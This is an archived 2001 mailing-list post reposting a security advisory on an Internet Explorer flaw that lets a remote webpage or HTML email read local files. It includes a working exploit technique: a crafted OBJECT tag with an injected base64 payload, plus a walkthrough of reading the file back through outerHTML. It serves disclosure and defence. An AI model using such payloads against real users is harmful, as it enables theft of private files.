Return-Path: <sentto-279987-3949-1006816087-fc=all.net@returns.groups.yahoo.com> Delivered-To: fc@all.net Received: from 204.181.12.215 [204.181.12.215] by localhost with POP3 (fetchmail-5.7.4) for fc@localhost (single-drop); Mon, 26 Nov 2001 15:12:10 -0800 (PST) Received: (qmail 29634 invoked by uid 510); 26 Nov 2001 23:08:30 -0000 Received: from n22.groups.yahoo.com (216.115.96.72) by all.net with SMTP; 26 Nov 2001 23:08:30 -0000 X-eGroups-Return: sentto-279987-3949-1006816087-fc=all.net@returns.groups.yahoo.com Received: from [10.1.4.56] by n22.groups.yahoo.com with NNFMP; 26 Nov 2001 23:08:06 -0000 X-Sender: fc@red.all.net X-Apparently-To: iwar@onelist.com Received: (EGP: mail-8_0_0_1); 26 Nov 2001 23:08:06 -0000 Received: (qmail 8569 invoked from network); 26 Nov 2001 23:08:06 -0000 Received: from unknown (216.115.97.172) by m12.grp.snv.yahoo.com with QMQP; 26 Nov 2001 23:08:06 -0000 Received: from unknown (HELO red.all.net) (65.0.156.78) by mta2.grp.snv.yahoo.com with SMTP; 26 Nov 2001 23:08:05 -0000 Received: (from fc@localhost) by red.all.net (8.11.2/8.11.2) id fAQN9j606498 for iwar@onelist.com; Mon, 26 Nov 2001 15:09:45 -0800 Message-Id: <200111262309.fAQN9j606498@red.all.net> To: iwar@onelist.com (Information Warfare Mailing List) Organization: I'm not allowed to say X-Mailer: don't even ask X-Mailer: ELM [version 2.5 PL3] From: Fred Cohen <fc@all.net> X-Yahoo-Profile: fcallnet Mailing-List: list iwar@yahoogroups.com; contact iwar-owner@yahoogroups.com Delivered-To: mailing list iwar@yahoogroups.com Precedence: bulk List-Unsubscribe: <mailto:iwar-unsubscribe@yahoogroups.com> Date: Mon, 26 Nov 2001 15:09:45 -0800 (PST) Reply-To: iwar@yahoogroups.com Subject: [iwar] [fc:Internet.Explorer.allows.reading.of.local.files.by.remote.webpages] Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Summary ------- There is a vulnerability in MS Internet Explorer that allows any webpage or HTML email to read arbitrary local files. This bug may also lead to remote command execution. Vulnerable versions ------------------- All versions of IE seem to be affected. The following configurations have been tested and are vulnerable: Windows 2000 pro, IE 5.50 Windows 2000 pro SP2, IE 6.0, fully patched Windows XP pro, IE 6.0 Workaround ---------- Disable ActiveX in Internet Explorer Exploit details --------------- The exploit is based on a very vague advisory postet to <a href="mailto:vuln-dev@securityfocus.com?Subject=Re:%20Internet%20Explorer%20allows%20reading%20of%20local%20files%20by%20remote%20webpages%2526In-Reply-To=%2526lt;1631496662.20011125115204@gmx.net">vuln-dev@securityfocus.com</a> by NOMEN NESCIO SECURITY ALERT <<a href="mailto:hush.little.baby@hushmail.com?Subject=Re:%20Internet%20Explorer%20allows%20reading%20of%20local%20files%20by%20remote%20webpages%2526In-Reply-To=%2526lt;1631496662.20011125115204@gmx.net">hush.little.baby@hushmail.com</a> on 21/11/2001: <a href="http://www.securityfocus.com/archive/82/241482">http://www.securityfocus.com/archive/82/241482> Marc Fossi <<a href="mailto:mfossi@securityfocus.com?Subject=Re:%20Internet%20Explorer%20allows%20reading%20of%20local%20files%20by%20remote%20webpages%2526In-Reply-To=%2526lt;1631496662.20011125115204@gmx.net">mfossi@securityfocus.com</a> suggests that this may be another way to exploit an old vulnerability discovered by Georgi Guninski: http://www.securityfocus.com/bid/1718 First we create either a "htmlfile_FullWindowEmbed" or a "htmlfile" object (both work): <OBJECT ID="myObject" CLASSID="CLSID:25336921-03F9-11CF-8FD0-00AA00686F13" </OBJECT Ok, alert(myObject.outerHTML); gives us the following: <OBJECT id=myObject classid=CLSID:25336921-03F9-11CF-8FD0-00AA00686F13 data=data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzxwPiZuYnNw OzwvcD4= </OBJECT Decoding the Base64 string we get (hex dump): 20693325F903CF11 8FD000AA00686F13 .i3%.........ho. 3C703E266E627370 3B3C2F703E <p&nbsp;</p The first part is a GUID and the second one looks like HTML. We inject the string "<scriptdocument.location.href="file://c:\\test.txt";</script" into the object using <OBJECT ID="myObject" CLASSID="CLSID:25336921-03F9-11CF-8FD0-00AA00686F13" data="data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzxzY3JpcHQ+ ZG9jdW1lbnQubG9jYXRpb24uaHJlZj0iZmlsZTovL2M6XFx0ZXN0LnR4dCI7PC9zY3JpcHQ+" </OBJECT (There are probably easier ways to do this but I'm not very familiar with IE coding). Now to the the interesting part. After c:\test.txt is loaded we can still access the data parameter of the object using myObject.outerHTML. This time it contains the Base64 encoded version of c:\test.txt among other things. So doing a alert(myObject.outerHTML); after the local file is loaded we get: <OBJECT id=myObject classid=CLSID:25336921-03F9-11CF-8FD0-00AA00686F13 data=data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzwhRE9DV FlQRSBIVE1MIFBVQkxJQyAiLS8vVzNDLy9EVEQgSFRNTCA0LjAgVHJhbnNpdGlvbmFsLy9 FTiI+DQo8SFRNTD48SEVBRD4NCjxNRVRBIGh0dHAtZXF1aXY9Q29udGVudC1UeXBlIGNvb nRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD13aW5kb3dzLTEyNTIiPjwvSEVBRD4NCjxCT0R ZPjxYTVA+aGVsbG8gd29ybGQ8L1hNUD48L0JPRFk+PC9IVE1MPg0K </OBJECT with the Base64 string decoding to: 20693325F903CF11 8FD000AA00686F13 .i3%.........ho. 3C21444F43545950 452048544D4C2050 <!DOCTYPE.HTML.P 55424C494320222D 2F2F5733432F2F44 UBLIC."-//W3C//D 54442048544D4C20 342E30205472616E TD.HTML.4.0.Tran 736974696F6E616C 2F2F454E223E0D0A sitional//EN".. 3C48544D4C3E3C48 4541443E0D0A3C4D <HTML<HEAD..<M 4554412068747470 2D65717569763D43 ETA.http-equiv=C 6F6E74656E742D54 79706520636F6E74 ontent-Type.cont 656E743D22746578 742F68746D6C3B20 ent="text/html;. 636861727365743D 77696E646F77732D charset=windows- 31323532223E3C2F 484541443E0D0A3C 1252"</HEAD..< 424F44593E3C584D 503E68656C6C6F20 BODY<XMPhello. 776F726C643C2F58 4D503E3C2F424F44 world</XMP</BOD 593E3C2F48544D4C 3E0D0A Y</HTML.. where "hello world" is the contents of c:\test.txt. It all boils down to an ordinary DOM circumvention with all the usual implications. Proof of concept exploit ------------------------ I have attached a zipped HTML file that reads c:\test.txt and displays it. regards, Markus Kern ------------------ http://all.net/ Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/
This archive was generated by hypermail 2.1.2 : 2001-12-31 20:59:59 PST